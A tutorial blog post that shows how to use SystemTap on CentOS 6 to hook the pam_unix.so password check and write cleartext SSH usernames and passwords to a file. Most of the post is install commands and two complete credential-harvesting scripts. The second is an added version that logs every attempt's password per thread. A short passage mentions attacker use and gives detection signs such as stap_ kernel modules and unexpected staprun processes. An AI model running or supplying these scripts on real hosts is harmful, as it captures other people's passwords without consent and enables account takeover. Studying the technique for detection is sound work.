Using SystemTap on CentOS to capture the username and password of an SSH login
SystemTap is a powerful tracing and debugging tool. It is best known for kernel-side probes, but it can also place probes on user-space functions, including functions inside shared libraries, as long as debug information for the binary is available. On Linux, the PAM stack (in particular the pam_unix module) is what checks the supplied user name and password and decides whether a user may log in. Building on that, this post uses SystemTap to probe function calls inside the shared library pam_unix.so and record the user name and password used for a remote SSH login. The same trick is used by attackers who already have root on a host to harvest credentials, so it is worth knowing from the defensive side as well.
Test environment: CentOS 6.4, 32-bit
Kernel version: 2.6.32-358.el6.i686
First install the required packages:
yum --releasever=6.4 update
yum install -y systemtap
debuginfo-install $(rpm -qf /lib/security/pam_unix.so)
The last command (debuginfo-install comes from yum-utils) installs the debuginfo package for whatever package owns pam_unix.so; that is what lets SystemTap resolve the function names and parameter names used in the script below. Because stap compiles the script into a kernel module, the kernel-devel package (and usually kernel-debuginfo) matching the running kernel must also be present; running stap-prep installs whatever is missing.
Create the script file and put the following code in it:
touch /root/capture_pass.stp
```systemtap
#!/usr/bin/stap
# Shared state: the most recently seen user name and password, and a flag
# that is 0 once a password check has succeeded and 1 otherwise.
global username, pass, isSuccRet = 1;

# Entry of the password check: copy the user name and the cleartext
# password out of sshd's memory. $name and $p are the parameter names
# from the pam debuginfo.
probe process("/lib/security/pam_unix.so").function("_unix_verify_password")
{
    username = user_string($name);
    pass = user_string($p);
}

# Return of the password check: PAM_SUCCESS is 0, so only a correct
# password is printed; failed attempts are silently dropped.
probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return
{
    if ($return == 0)
    {
        printf("User: %s\nPassword: %s\n", username, pass);
        isSuccRet = 0;
    }
}

# A session is being opened. If no password check succeeded before it,
# print whatever was last captured, then reset the flag for the next login.
probe process("/lib/security/pam_unix.so").function("pam_sm_open_session")
{
    if (isSuccRet != 0)
    {
        printf("Login via ssh service.\nUser: %s\nPassword: %s\n", username, pass);
    }
    isSuccRet = 1;
}
```
Make the script executable:
chmod +x capture_pass.stp
Create the file that will receive the captured credentials (optional, since -o creates it if it does not exist):
touch password.txt
Run the SystemTap script, sending its output to that file:
stap capture_pass.stp -o password.txt
Leave capture_pass.stp running on the host and log in to it over SSH from another machine. A failed first attempt records nothing, because the return probe only prints when _unix_verify_password returns 0; once a login succeeds, stop the script with Ctrl-C and password.txt contains the captured user name and password. Two caveats: the script keeps a single global username/pass pair, so two logins being authenticated at the same time can overwrite each other, and a public-key login never calls _unix_verify_password, so the pam_sm_open_session probe would print stale values from an earlier password login. stap has to be run as root (or as a member of the stapdev/stapusr groups) because it compiles and loads a kernel module; on the defensive side, that module is visible in lsmod with a name beginning with stap_, and an unexpected stap or staprun process on a production server is a strong indicator that someone is harvesting credentials this way.
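The following is an added example and not the original author's script. It keeps the same probe points and the same $name/$p parameter names from the page, but stores the captured values per thread id so concurrent authentications cannot overwrite each other, reports every attempt (success or failure, with the PAM return code) at the moment _unix_verify_password returns, and logs session opens without trying to pair them with a password. It assumes the same CentOS 6 layout (/lib/security/pam_unix.so with pam debuginfo installed) and that the installed SystemTap provides user_string2(), which returns a fallback string instead of aborting the script when a user-space pointer cannot be read.

```systemtap
#!/usr/bin/stap
# Added example, not the original post's script.
# Assumptions: /lib/security/pam_unix.so with pam debuginfo so that $name and
# $p resolve; user_string2() available in the installed SystemTap.

# Per-thread capture so that concurrent sshd authentications do not collide.
global uname_by_tid, pass_by_tid

probe process("/lib/security/pam_unix.so").function("_unix_verify_password")
{
    # user_string2() returns the fallback instead of stopping the script when
    # the pointer is NULL or unreadable (e.g. an empty password).
    uname_by_tid[tid()] = user_string2($name, "<unreadable>")
    pass_by_tid[tid()]  = user_string2($p, "<unreadable>")
}

probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return
{
    # A return with no matching entry can happen when the script was
    # started while a check was already in progress; ignore it.
    if (!([tid()] in uname_by_tid)) next

    # PAM_SUCCESS is 0; any other value is a failed or rejected attempt.
    status = ($return == 0) ? "SUCCESS" : sprintf("FAIL(%d)", $return)

    printf("%s pid=%d tid=%d comm=%s result=%s user=%s pass=%s\n",
           ctime(gettimeofday_s()), pid(), tid(), execname(),
           status, uname_by_tid[tid()], pass_by_tid[tid()])

    delete uname_by_tid[tid()]
    delete pass_by_tid[tid()]
}

# Log session opens on their own. The process that opens the session is not
# always the one that verified the password, and public-key logins never call
# _unix_verify_password, so no password is attributed here.
probe process("/lib/security/pam_unix.so").function("pam_sm_open_session")
{
    printf("%s pid=%d comm=%s pam_sm_open_session\n",
           ctime(gettimeofday_s()), pid(), execname())
}
```

Run it the same way as the page's script (stap capture_pass2.stp -o password.txt, as root). Because every attempt is printed with its return code, the output also doubles as a simple record of password-guessing against the host, which is the view a defender would want from the same probe points.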